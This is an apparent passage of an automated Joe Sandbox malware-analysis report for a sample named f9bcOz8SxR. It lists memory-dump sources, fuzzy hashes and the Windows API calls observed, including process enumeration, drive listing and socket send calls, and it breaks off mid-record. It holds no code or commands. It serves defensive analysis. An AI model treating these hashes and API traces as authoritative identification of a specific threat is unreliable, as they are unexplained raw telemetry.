                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_880000_f9bcOz8SxR.jbxd
                                                                Similarity
                                                                • API ID: gethostname
                                                                • String ID:
                                                                • API String ID: 144339138-0
                                                                • Opcode ID: 8a05a8d4edd1aec4e7407bd67fdac657ff0716203cbb91103cb973b5f4478c01
                                                                • Instruction ID: 9b515b6a3dd30cbe25c5f9d61d2bbefd78b40c41a6f8bc68bf1623c55f1d0770
                                                                • Opcode Fuzzy Hash: 8a05a8d4edd1aec4e7407bd67fdac657ff0716203cbb91103cb973b5f4478c01
                                                                • Instruction Fuzzy Hash: ED51D2706047008BEB309B25DD49727B6E8EF81715F16193DE98A866E1E779FC84CF02
                                                                APIs
                                                                • Process32FirstW.KERNEL32(47CF7FBB,?,?,?), ref: 07000362
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2635445326.0000000007000000.00000040.00001000.00020000.00000000.sdmp, Offset: 07000000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7000000_f9bcOz8SxR.jbxd
                                                                Similarity
                                                                • API ID: FirstProcess32
                                                                • String ID:
                                                                • API String ID: 2623510744-0
                                                                • Opcode ID: 1701631adabd4b44e1dd8550b5960d60a814f0863db5e79a7654b7f44d3ea205
                                                                • Instruction ID: 505ae6396fe362cb78577b3c5a9b6a39c10efd59dae77b6def7d32048cc7dfe2
                                                                • Opcode Fuzzy Hash: 1701631adabd4b44e1dd8550b5960d60a814f0863db5e79a7654b7f44d3ea205
                                                                • Instruction Fuzzy Hash: 4131B4E626D211BEB20281455B94BFE6A3EE7C7370F30822AB417D56C2E7D44E0A51B1
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2635445326.0000000007000000.00000040.00001000.00020000.00000000.sdmp, Offset: 07000000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7000000_f9bcOz8SxR.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 53c97646666721ea6239c19c80884a491c3f49cee6ab4909aa9b02defe1a9594
                                                                • Instruction ID: 69ffd37de049ecd028c8846cc31f576aec1daa01afc74902b68e7c4b0643f4a7
                                                                • Opcode Fuzzy Hash: 53c97646666721ea6239c19c80884a491c3f49cee6ab4909aa9b02defe1a9594
                                                                • Instruction Fuzzy Hash: 0131C3E62AD211BDB20281419B94BFE963EE7D7330F30863AB427D12C2E7D44A0951F1
                                                                APIs
                                                                • Process32FirstW.KERNEL32(47CF7FBB,?,?,?), ref: 07000362
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2635445326.0000000007000000.00000040.00001000.00020000.00000000.sdmp, Offset: 07000000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7000000_f9bcOz8SxR.jbxd
                                                                Similarity
                                                                • API ID: FirstProcess32
                                                                • String ID:
                                                                • API String ID: 2623510744-0
                                                                • Opcode ID: 628bb47958c86a6af2f8f493f9c65f510e58177dfd1e5fa0881fe4e0d25e1d3a
                                                                • Instruction ID: 0e5080a792a59f1059aa023890c577fc8920491b39e6e3a2966302edbdadd864
                                                                • Opcode Fuzzy Hash: 628bb47958c86a6af2f8f493f9c65f510e58177dfd1e5fa0881fe4e0d25e1d3a
                                                                • Instruction Fuzzy Hash: 0531A6F765D211BEB20281515B54BFE6B3DEBC7330F30856AB817D6182E7A44E0951B1
                                                                APIs
                                                                • Process32FirstW.KERNEL32(47CF7FBB,?,?,?), ref: 07000362
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2635445326.0000000007000000.00000040.00001000.00020000.00000000.sdmp, Offset: 07000000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7000000_f9bcOz8SxR.jbxd
                                                                Similarity
                                                                • API ID: FirstProcess32
                                                                • String ID:
                                                                • API String ID: 2623510744-0
                                                                • Opcode ID: 56aa00761dc5ce65198706ca22c6b59494f33260591f8e61df825f53e7f3ef87
                                                                • Instruction ID: 88b8bcddc9933f5f2631f5728b0c464ed6d5d80a58fb4455656801b7adc73d7b
                                                                • Opcode Fuzzy Hash: 56aa00761dc5ce65198706ca22c6b59494f33260591f8e61df825f53e7f3ef87
                                                                • Instruction Fuzzy Hash: 222193EA26D111BD720281419B94BFE563DE7C7370F30822AB427D26C2E7E44E4951F1
                                                                APIs
                                                                • Process32FirstW.KERNEL32(47CF7FBB,?,?,?), ref: 07000362
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2635445326.0000000007000000.00000040.00001000.00020000.00000000.sdmp, Offset: 07000000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7000000_f9bcOz8SxR.jbxd
                                                                Similarity
                                                                • API ID: FirstProcess32
                                                                • String ID:
                                                                • API String ID: 2623510744-0
                                                                • Opcode ID: 398a352639f03ad666973572221799f7d034f4fee9f097f7d2f92f7bae6fd819
                                                                • Instruction ID: 53c610d37fc32e2e9c499ac474f45f846f8f28987e1a4b98ee4acbd32ab58ef3
                                                                • Opcode Fuzzy Hash: 398a352639f03ad666973572221799f7d034f4fee9f097f7d2f92f7bae6fd819
                                                                • Instruction Fuzzy Hash: F121D3F625D121BEB202C1515FA8AFE6B6DEBC7370F30857AF806C6082E7D44E4A51B1
                                                                APIs
                                                                • Process32FirstW.KERNEL32(47CF7FBB,?,?,?), ref: 07000362
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2635445326.0000000007000000.00000040.00001000.00020000.00000000.sdmp, Offset: 07000000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7000000_f9bcOz8SxR.jbxd
                                                                Similarity
                                                                • API ID: FirstProcess32
                                                                • String ID:
                                                                • API String ID: 2623510744-0
                                                                • Opcode ID: 8bc2e452c2f7dcff97ba4f15cf8f0958d5b9b1a88004873ace77fc9b2cc60bea
                                                                • Instruction ID: 0e028fa694d8eec2724e2958b9d84e731fb20cd41ca94a9b68921c1e786f0987
                                                                • Opcode Fuzzy Hash: 8bc2e452c2f7dcff97ba4f15cf8f0958d5b9b1a88004873ace77fc9b2cc60bea
                                                                • Instruction Fuzzy Hash: E81172FB25D1157EB20686416F94AFFAA6DE6C7370F30857EF406D2182E6D40E0951B1
                                                                APIs
                                                                • Process32FirstW.KERNEL32(47CF7FBB,?,?,?), ref: 07000362
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2635445326.0000000007000000.00000040.00001000.00020000.00000000.sdmp, Offset: 07000000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7000000_f9bcOz8SxR.jbxd
                                                                Similarity
                                                                • API ID: FirstProcess32
                                                                • String ID:
                                                                • API String ID: 2623510744-0
                                                                • Opcode ID: 62c3885f88b763faea934f5a4111ba07dfd9b138f206306f7a14c9f9bc162443
                                                                • Instruction ID: 8c20ce4f851e3e7efdad1f69a4f74735e7762d3fff6d0f69eb1a9e84c5e6d0c4
                                                                • Opcode Fuzzy Hash: 62c3885f88b763faea934f5a4111ba07dfd9b138f206306f7a14c9f9bc162443
                                                                • Instruction Fuzzy Hash: 1311D0FB29D1217E7206C1816BA8AFF6A2CE7C7370F30853AB816D2482E7D04E4D51B1
                                                                APIs
                                                                • Process32FirstW.KERNEL32(47CF7FBB,?,?,?), ref: 07000362
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2635445326.0000000007000000.00000040.00001000.00020000.00000000.sdmp, Offset: 07000000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7000000_f9bcOz8SxR.jbxd
                                                                Similarity
                                                                • API ID: FirstProcess32
                                                                • String ID:
                                                                • API String ID: 2623510744-0
                                                                • Opcode ID: 8ad37de52552d3f7d988a837bbfb79edce3144a910d799afb3d9443bab0365e3
                                                                • Instruction ID: f2f55c7dc7d9a75b790d0eaf9e65be387ee56d8ac7f5338ab5f4ce42e124f5e4
                                                                • Opcode Fuzzy Hash: 8ad37de52552d3f7d988a837bbfb79edce3144a910d799afb3d9443bab0365e3
                                                                • Instruction Fuzzy Hash: 101191FB25D1217E7206C5416F98AFEA62DE6C7370F30857AB816D2182E7D00E4D51B1
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2635326293.0000000006FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06FB0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6fb0000_f9bcOz8SxR.jbxd
                                                                Similarity
                                                                • API ID: DrivesLogical
                                                                • String ID:
                                                                • API String ID: 999431828-0
                                                                • Opcode ID: 92935da883f60d4d42c2958aaf742df708a9f0bcf5e222e4212cf3d87f4a5127
                                                                • Instruction ID: d59a7fd2c59a42f3f29e6557bbdb014b757f61ae0ff2b3b2fd103b2a262e2f83
                                                                • Opcode Fuzzy Hash: 92935da883f60d4d42c2958aaf742df708a9f0bcf5e222e4212cf3d87f4a5127
                                                                • Instruction Fuzzy Hash: D60149D3108101BDF3D2A6576B507F77B9EEBCA3307309866F047C6642DF491A4652B2
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2635326293.0000000006FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06FB0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6fb0000_f9bcOz8SxR.jbxd
                                                                Similarity
                                                                • API ID: DrivesLogical
                                                                • String ID:
                                                                • API String ID: 999431828-0
                                                                • Opcode ID: fc367792e0f81908fdcbbab916e9c801a8cd87e2a19189f925e36eb69e01a569
                                                                • Instruction ID: 5d815b520ed6121d1c0f1cdbd749301ec1c6604192e4f264f2e364ae73acb812
                                                                • Opcode Fuzzy Hash: fc367792e0f81908fdcbbab916e9c801a8cd87e2a19189f925e36eb69e01a569
                                                                • Instruction Fuzzy Hash: 29017BE310C1417DF382A2B66A513F77FADDA8B3307315866E442CA283DE490A464172
                                                                APIs
                                                                • GetLogicalDrives.KERNELBASE ref: 06FB0CDA
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2635326293.0000000006FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06FB0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6fb0000_f9bcOz8SxR.jbxd
                                                                Similarity
                                                                • API ID: DrivesLogical
                                                                • String ID:
                                                                • API String ID: 999431828-0
                                                                • Opcode ID: ef778b6e09abdd98d7c3f10afc916a84825ffe94f7b7dcf30fcf6c788e7a0362
                                                                • Instruction ID: 1c73a7b70be4840dfd2fc1be6db9b0a4622efbf48fd90143119945ec4ad1e19d
                                                                • Opcode Fuzzy Hash: ef778b6e09abdd98d7c3f10afc916a84825ffe94f7b7dcf30fcf6c788e7a0362
                                                                • Instruction Fuzzy Hash: EBF0F9E710C1417DB781A2A727517F7BBAAD9CB3303306866F453C9542DF49064A4572
                                                                APIs
                                                                • Process32FirstW.KERNEL32(47CF7FBB,?,?,?), ref: 07000362
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2635445326.0000000007000000.00000040.00001000.00020000.00000000.sdmp, Offset: 07000000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7000000_f9bcOz8SxR.jbxd
                                                                Similarity
                                                                • API ID: FirstProcess32
                                                                • String ID:
                                                                • API String ID: 2623510744-0
                                                                • Opcode ID: 96abc433b166547b68d3e40780acc813ca4e0f7039edc74ec249db84facfb016
                                                                • Instruction ID: e24cda7aa77cde2be9a4d4cc2b59e87cc07b420b8526006dec986b86ae3a18bf
                                                                • Opcode Fuzzy Hash: 96abc433b166547b68d3e40780acc813ca4e0f7039edc74ec249db84facfb016
                                                                • Instruction Fuzzy Hash: 42F0E2FA30D2187FB212A9415FC4ABF667CDAD73B0B31853AF815D6142E6E00C4E92B0
                                                                APIs
                                                                • getsockname.WS2_32(?,?,00000080), ref: 0094AFD0
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2623343167.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_880000_f9bcOz8SxR.jbxd
                                                                Similarity
                                                                • API ID: getsockname
                                                                • String ID:
                                                                • API String ID: 3358416759-0
                                                                • Opcode ID: 6e839ce3109f8f125d22f9d3b7acc392664cb6410cd6a47ff7bf5e62a9a470b0
                                                                • Instruction ID: dd1a116f933e663e61f5c8aaa4bbf5cbbfda3af955140f696538fa0956f76678
                                                                • Opcode Fuzzy Hash: 6e839ce3109f8f125d22f9d3b7acc392664cb6410cd6a47ff7bf5e62a9a470b0
                                                                • Instruction Fuzzy Hash: D611B97084878495EB268F1CD802BF6F3F8EFD0329F109618E5D942150F7329AC98BC2
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2635326293.0000000006FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06FB0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6fb0000_f9bcOz8SxR.jbxd
                                                                Similarity
                                                                • API ID: DrivesLogical
                                                                • String ID:
                                                                • API String ID: 999431828-0
                                                                • Opcode ID: 44bb1c2adc51ee0b22e03582893974e1ece9b06ef540a105147933f05e692bed
                                                                • Instruction ID: f493e5a6a7ac9e6fc187b0ea95c9c7e9dfb377bc3f5c2e1fa1d5550874fec431
                                                                • Opcode Fuzzy Hash: 44bb1c2adc51ee0b22e03582893974e1ece9b06ef540a105147933f05e692bed
                                                                • Instruction Fuzzy Hash: 1AF024E71080017DF7C1A1572E506F77BAADACA330320985AF411CA583DF581A564573
                                                                APIs
                                                                • send.WS2_32(?,?,?,00000000,00000000,?), ref: 0094A97F
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2623343167.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_880000_f9bcOz8SxR.jbxd
                                                                Similarity
                                                                • API ID: send
                                                                • String ID:
                                                                • API String ID: 2809346765-0
                                                                • Opcode ID: 260745ed54d2ddc828b066881aa2ff39f961867f94ae1d1b8db9b86baad3a00f
                                                                • Instruction ID: 027414d7aa17cb61c801880072ebb54ba47c7c39a3b120f8f33c4b55889adcc7
                                                                • Opcode Fuzzy Hash: 260745ed54d2ddc828b066881aa2ff39f961867f94ae1d1b8db9b86baad3a00f
                                                                • Instruction Fuzzy Hash: 5901A2B6B10710AFC6148F14DC85F56B7A5EF84720F06865DEA982B361C331AC108BE1
                                                                APIs
                                                                • Process32FirstW.KERNEL32(47CF7FBB,?,?,?), ref: 07000362
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2635445326.0000000007000000.00000040.00001000.00020000.00000000.sdmp, Offset: 07000000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7000000_f9bcOz8SxR.jbxd
                                                                Similarity
                                                                • API ID: FirstProcess32
                                                                • String ID:
                                                                • API String ID: 2623510744-0
                                                                • Opcode ID: d237fffa16db071e318beb57bb455496a6ce0a558a1482da107d1a92e7b3a25c
                                                                • Instruction ID: 2febd6c2bec85747e30990148a2c99349fe94c132403ca864942b533b93dbcb1
                                                                • Opcode Fuzzy Hash: d237fffa16db071e318beb57bb455496a6ce0a558a1482da107d1a92e7b3a25c
                                                                • Instruction Fuzzy Hash: FDE0D8FB7091147FA21396811BD55FE7B2CDEC72B1B318479E00495015DEE00D4E93B1
                                                                APIs
                                                                • GetLogicalDrives.KERNELBASE ref: 06FB0CDA
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2635326293.0000000006FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06FB0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6fb0000_f9bcOz8SxR.jbxd
                                                                Similarity
                                                                • API ID: DrivesLogical
                                                                • String ID:
                                                                • API String ID: 999431828-0
                                                                • Opcode ID: c5b4a97b93232ee9a3c1654e88be541b49dde5b613749d7f8f06796572eb5c17
                                                                • Instruction ID: 1e5445092c363bf7142f5a8d0c465822b1bec040dff13ecc045cc2e569bdf396
                                                                • Opcode Fuzzy Hash: c5b4a97b93232ee9a3c1654e88be541b49dde5b613749d7f8f06796572eb5c17
                                                                • Instruction Fuzzy Hash: E4E017E725C0117D76C2D1963BB16F76B9FE4CB6303309817F80AC8986DE891A4A1173
                                                                APIs
                                                                • socket.WS2_32(?,0094B280,00000000,-00000001,00000000,0094B280,?,?,00000002,00000011,?,?,00000000,0000000B,?,?), ref: 0094AF67
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2623343167.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_880000_f9bcOz8SxR.jbxd
                                                                Similarity
                                                                • API ID: socket
                                                                • String ID:
                                                                • API String ID: 98920635-0
                                                                • Opcode ID: 13a234d225264f176428c79716ed8276dc0b6011879153129ffd569ac02cec9d
                                                                • Instruction ID: f31e9c4a71810d02f43b08702e05039e597d4fdbae0ff5f3ec13285fa89486f1
                                                                • Opcode Fuzzy Hash: 13a234d225264f176428c79716ed8276dc0b6011879153129ffd569ac02cec9d
                                                                • Instruction Fuzzy Hash: 1DE0EDB6A093216FD654DB18F844DABF36DEFC4B20F055A89B85467204C330AC558BE2
                                                                APIs
                                                                • closesocket.WS2_32(?,00949422,?,?,?,?,?,?,?,?,?,?,?,00933377,00CC7680,00000000), ref: 0094B04D
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2623343167.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_880000_f9bcOz8SxR.jbxd
                                                                Similarity
                                                                • API ID: closesocket
                                                                • String ID:
                                                                • API String ID: 2781271927-0
                                                                • Opcode ID: 808e21bd5e4cd241bc055dda431bd06b07646c775277c96fe955f53abee9f266
                                                                • Instruction ID: 80bc8b3373954415339e67fd6e54ac61194b8a80750a1e45f4cecf3b81acac39
                                                                • Opcode Fuzzy Hash: 808e21bd5e4cd241bc055dda431bd06b07646c775277c96fe955f53abee9f266
                                                                • Instruction Fuzzy Hash: E3D0EC3460020157CA249A148984A67776B7FD1711FA9CA68A42C4A569D73ADC468641
                                                                APIs
                                                                • Process32FirstW.KERNEL32(47CF7FBB,?,?,?), ref: 07000362
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2635445326.0000000007000000.00000040.00001000.00020000.00000000.sdmp, Offset: 07000000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7000000_f9bcOz8SxR.jbxd
                                                                Similarity
                                                                • API ID: FirstProcess32
                                                                • String ID:
                                                                • API String ID: 2623510744-0
                                                                • Opcode ID: 0fd51c1e2972fd80b1d7c73fe84255666e48674007a1835a1cf5e21e7994a852
                                                                • Instruction ID: 724bf1588d894d6850cd4c92820dc1059a649e5616b80232383762c4a6b08594
                                                                • Opcode Fuzzy Hash: 0fd51c1e2972fd80b1d7c73fe84255666e48674007a1835a1cf5e21e7994a852
                                                                • Instruction Fuzzy Hash: 93D0A7A5B0620C7F9301A6525AE06EF362CDE967F0B35C468A01499124DFA05C45A3E0
                                                                APIs
                                                                • ioctlsocket.WS2_32(?,8004667E,?,?,008BAF56,?,00000001), ref: 008E67FC
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2623343167.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_880000_f9bcOz8SxR.jbxd
                                                                Similarity
                                                                • API ID: ioctlsocket
                                                                • String ID:
                                                                • API String ID: 3577187118-0
                                                                • Opcode ID: aa6ed6e3fefe81b0d2eb5d89cf4e6d3dff1a5c7e15842f73a6b1375bf3cdc5e7
                                                                • Instruction ID: 83e04ead97ecfab842b32efa3409d0dda0cbd0588d593ef691927f796129b38d
                                                                • Opcode Fuzzy Hash: aa6ed6e3fefe81b0d2eb5d89cf4e6d3dff1a5c7e15842f73a6b1375bf3cdc5e7
                                                                • Instruction Fuzzy Hash: E9C080F111D201BFC70C8714D855B2F77D8DB44355F13581CB046C1190EA345990CF1B
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2623343167.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_880000_f9bcOz8SxR.jbxd
                                                                Similarity
                                                                • API ID: CloseHandle
                                                                • String ID:
                                                                • API String ID: 2962429428-0
                                                                • Opcode ID: 0469524f39816575881b5fd1c13a55a4e85faa77bf4bfa221f5e2583f18a9c15
                                                                • Instruction ID: 5f3c00b6f7ee40ee1909fee21fa57215cd367bb7f649ca90bebf9ac8593e3330
                                                                • Opcode Fuzzy Hash: 0469524f39816575881b5fd1c13a55a4e85faa77bf4bfa221f5e2583f18a9c15
                                                                • Instruction Fuzzy Hash: 4F3181B49097099BCB00EFB8C98569EBBF4FF44744F00886EE898A7351E7749A44DF52
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2623343167.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_880000_f9bcOz8SxR.jbxd
                                                                Similarity
                                                                • API ID: Sleep
                                                                • String ID:
                                                                • API String ID: 3472027048-0
                                                                • Opcode ID: d67f5ba562bf8adc7c04a6883a17ce67d4bf511e8dc4890cb7991c4f7d17ede7
                                                                • Instruction ID: 39d1de8ddd0b1d5fc5ec538b0c2750156445db682d0703787bad4f1dc57934e4
                                                                • Opcode Fuzzy Hash: d67f5ba562bf8adc7c04a6883a17ce67d4bf511e8dc4890cb7991c4f7d17ede7
                                                                • Instruction Fuzzy Hash: B6C04CE1C1474446D700BB38C58611D79E47745108FD11B68998496195F62893198657
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2635283279.0000000006FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06FA0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6fa0000_f9bcOz8SxR.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 56c359b883a2b45c88bcfda2ba9ef0b64bf96002ef6372b40897b88c4535a6da
                                                                • Instruction ID: c1424644d77739ff5e5642715d4392fa90b9793244b279f63e5b5186aa83085f
                                                                • Opcode Fuzzy Hash: 56c359b883a2b45c88bcfda2ba9ef0b64bf96002ef6372b40897b88c4535a6da
                                                                • Instruction Fuzzy Hash: 6491BBFB40C315BEF3818585BB54BFA676EE7DA338F308426F407D1602EBA80A4955B5
                                                                • Opcode Fuzzy Hash: af3cafb0f7ba9d86a2a81ce2ff0b04cef78dfd2cae6af92c2b121888e6647c8f
                                                                • Instruction Fuzzy Hash: 86916AFB44C315BEF3818585BB54BFA676EE7DA338F308426F407D1602EBA80A4945B5
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2635283279.0000000006FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06FA0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6fa0000_f9bcOz8SxR.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 42fe5e6b74f0dd17d0c97c3d157c4c4e6bc2b32366b2082adc2496edc3d1a827
                                                                • Instruction ID: dd89ca7226fd8e10f99a12f325716eb941e3091bd544d1ac7066d32f7843dded
                                                                • Opcode Fuzzy Hash: 42fe5e6b74f0dd17d0c97c3d157c4c4e6bc2b32366b2082adc2496edc3d1a827
                                                                • Instruction Fuzzy Hash: D6818BFB44C315AEF3818585BB54BFA676EE7DA33CF308426F407D1602EBA80A4945B5
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2635283279.0000000006FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06FA0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6fa0000_f9bcOz8SxR.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: a5c9b72550efd075ccb24fb642f45e9f749da5b7ca96884cf886db894066bb67
                                                                • Instruction ID: 923d1af214a5ba7584b9ed182b9d945b795f116620bfbecb76df8964ce25abba
                                                                • Opcode Fuzzy Hash: a5c9b72550efd075ccb24fb642f45e9f749da5b7ca96884cf886db894066bb67
                                                                • Instruction Fuzzy Hash: C0818BFB44C315AEF3818585BB54BFA676EE7D633CF308426F407D1602EBA80A4945B5
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2635283279.0000000006FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06FA0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6fa0000_f9bcOz8SxR.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 6a6c12590e46b58d36fe42510bdfab752dd28d28593adf66a2a0af7463aee84e
                                                                • Instruction ID: df0d88c438c4c99e2d1456b5c5d0988ad971faa1a3c874518438f7074f8f4c8d
                                                                • Opcode Fuzzy Hash: 6a6c12590e46b58d36fe42510bdfab752dd28d28593adf66a2a0af7463aee84e
                                                                • Instruction Fuzzy Hash: 71817CFB44C315BEF3818585BB54BFA676EA7D633CF308426F407D1602EBA80A8945B5
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2635283279.0000000006FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06FA0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6fa0000_f9bcOz8SxR.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: cade172d505f859c7eee10ed28b475692c2625510dd6898a017c1347abfa90bc
                                                                • Instruction ID: d3cef347b142274647d9352c30c71f3b142b09b13d295d9f2abf4f44c5ff5015
                                                                • Opcode Fuzzy Hash: cade172d505f859c7eee10ed28b475692c2625510dd6898a017c1347abfa90bc
                                                                • Instruction Fuzzy Hash: C871BFFB40C315FEF3828585BB54AFA676EE7DA33CB308426F407D5602EBA40A4945B5
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2635283279.0000000006FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06FA0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6fa0000_f9bcOz8SxR.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 42ba57c704a8ff69247ff25089f2292a796290f526967b93fd63bd3f078b541d
                                                                • Instruction ID: 0e758eedc1ccff24b1e6facb0c542202f2ec39bd07b0c89f99199cc16a6b3761
                                                                • Opcode Fuzzy Hash: 42ba57c704a8ff69247ff25089f2292a796290f526967b93fd63bd3f078b541d
                                                                • Instruction Fuzzy Hash: 54716CFB44C315BEF3818585BB54BFA676EA7DA33CF308426F407D1601EBA80A8945B5
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2635283279.0000000006FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06FA0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6fa0000_f9bcOz8SxR.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 4a3b41367d40d4410c85ac84d53cc78e3b213184835b0c3f909ac88a97bfd3e3
                                                                • Instruction ID: ad0a2fa53822e5e6e7cd8350ed38ad4e2a848d9971dd3ab1b820478e452f3a63
                                                                • Opcode Fuzzy Hash: 4a3b41367d40d4410c85ac84d53cc78e3b213184835b0c3f909ac88a97bfd3e3
                                                                • Instruction Fuzzy Hash: 13716CFB44C315BEF3818581BB54BFA676EA7DA33CF308426F407D5602EBA80A4945B5
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2635283279.0000000006FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06FA0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6fa0000_f9bcOz8SxR.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 10ea050557df004eba8eb39251f61666e29e75ee80a429e42b2e88b80ddd6c4e
                                                                • Instruction ID: c20cdfe9ba1f55a3c5298b413f8c64d8cd7d040856f96dc3b82bb52218a4a854
                                                                • Opcode Fuzzy Hash: 10ea050557df004eba8eb39251f61666e29e75ee80a429e42b2e88b80ddd6c4e
                                                                • Instruction Fuzzy Hash: E1719EFB44D315FDB3818581BB54AFA676EE7DA33CB308426F407D1602EBA40A8945F5
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2635283279.0000000006FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06FA0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
